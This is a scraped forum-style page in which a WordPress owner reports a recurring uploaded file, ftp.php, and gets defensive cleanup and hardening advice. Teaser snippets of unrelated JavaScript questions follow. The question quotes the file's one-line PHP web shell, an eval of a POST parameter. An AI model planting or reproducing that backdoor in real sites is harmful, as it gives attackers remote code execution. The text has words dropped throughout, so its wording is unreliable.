wordpress - Hacker leaves ftp.php -


it appears if couple of wordpress sites keep getting hacked. have wordfence installed , have changed passwords ect. file called http://ftp.php keeps getting uploaded “uploads”-folder.

it contains this:

<?php echo '123.txt'; ?> <?php @eval($_post['a']);?>

what do? idead how rid of this? havn’t experienced other issues on blog besides file.

just bit of advice started, if he's had access server, need lot more patch original security hole exploited.

1] need determine how he's uploading file , prevent him doing so. if there form on web site not validate data (by using sanitize_key() or equivalent) injecting code way. ensure user input on site being sanitized, double check everything, plug-ins, own code, etc.

2] has gained access on server level? has merely gained access wordpress back-end? if he's had ftp or similar access site, , mean ever hacked in , had it, need make sure has not set back-door of kind. when you've changed log-ins, , has still managed re-upload file, indicative of back-door. if it's not backdoor, he's re-using whatever security vulnerability used gain access first time. idea check on server make sure hasen't inserted rogue php file somewhere allows him re-execute code. if have clean back-up of server files before gained access, wipe server , re-upload clean copy. need clean after him in order stay 1 step ahead.

3] determine vulnerability he's exploiting gain access site. if of user input on site being sanitized, , confident hasn't set backdoor, need start logging everything, , checking logs if/when happens again. if cannot prevent him accessing server, need catch him doing can better understand has access , how he's accessing it. know, guy have shell access now, , not logging in through ftp or wordpress anymore. need due diligence, , figure out leaks are. patch them.

4] realistic , humble. if find has infiltrated far experience handle, talk hosting provider, , tell them situation. it's ok ask them help, there for. believe me, last thing want hacker rooting around precious servers. have logs of him accessing server, , may able ip address. @ least, should able assist in keeping him out if he's accessing site on server level.

5] if manage him out, need ensure have plugged leaks in wordpress installation. data needs sanitized, ensure there no rogue files on server, use few plugins possible (they present more opportunities security holes don't know yet), , ensure have strong passwords not easy brute force. it's idea keep logging can have refer when things happen. more difficult make him access server, more move on easier target. best offense against hackers defense.

you might find article wordpress codex informative: http://codex.wordpress.org/hardening_wordpress

6] files , databases. now. once have taken care of this, it's idea back-up have on server if haven't already. need realize hacker could have been complete jerk, , deleted everything. once know files clean , server hacker free, back...up...everything. databases well. should doing weekly @ least, depending on how update site, , store back-ups on different server. if want smart, make third backup on local machine. more merrier, because not want find in position have start scratch because hacker decided delete of files.

best of luck, , keep posted if have updates. may able give more specific , better advice.


Comments

Post a Comment

Popular posts from this blog

javascript - Jquery show_hide, what to add in order to make the page scroll to the bottom of the hidden field once button is clicked -

i have button on website when clicked, reveals map. button can seen when page first loads up, when clicked, section holding map slides open , goes out of screen since page loads @ top (normal). want page scroll down bottom of div select when button pushed, if map out of screen. if page scrolled down, , clicks show map button, don't want page jump bottom of map. i tried figure out myself, no luck. seasoned jquery coders able give me guidance? many thanks! map = mapdiv.gmap3("get"); infobox = new infobox({ pixeloffset: new google.maps.size(-220, -310), closeboxurl: '', enableeventpropagation: true }); mapdiv.delegate('.infobox .close','click',function () { infobox.close(); }); jquery(".slidingdiv").hide(); jquery(".show_hide").show(); jquery('.show_hide').click(function(){ lastcenter=map.getcenter(); jquery(".slidingdiv&quo
Read more

javascript - Highcharts multi-color line -

Image
i looking create highchart multi-colored line. if goes down under value, become red, , when comes on value, become green . here picture example: or maybe highcharts have other charts models differentiate high or low level color? you can achieve coloring using lineargradient coloring: color: { lineargradient: { x1: 0, x2: 0, y1: 0, y2: 1 }, stops: [ [0, 'red'], [0.25, 'yellow'], [0.50, 'green'], [0.75, 'yellow'], [1, 'red'] ] } here 0 in stops relates minimum value of series , 1 maximum value, , in between percentages between values. if find percentages according values prior creating chart use correct stops values make relate specific values in data (at least approximately). see this jsfiddle example .
Read more

javascript - Enter key does not work in search box -

tried search guys sorry. input in search box doesnt work (or search) when hit enter when user clicks search button. doing wrong? here code. thanks. <script type="text/javascript"> $(document).ready(function() { $("#submit").click(function() { var url = "http://asla.org/awardssearch.html"; url += "?s=" + $('#googlecse').val(); window.location = url; }); $('#googlecse').keydown(function(event) { if (event.keycode == '13') { $("#submit").click(); } else { //do nothing :) } }); }); </script> <form class="navbar-form navbar-right" role="search"> <div class="search"> <input id="googlecse" type="text" onblur="if(this.value=='')this.value=this.defaultvalue;" onfocus="if(this.value==this.defaultvalue)t
Read more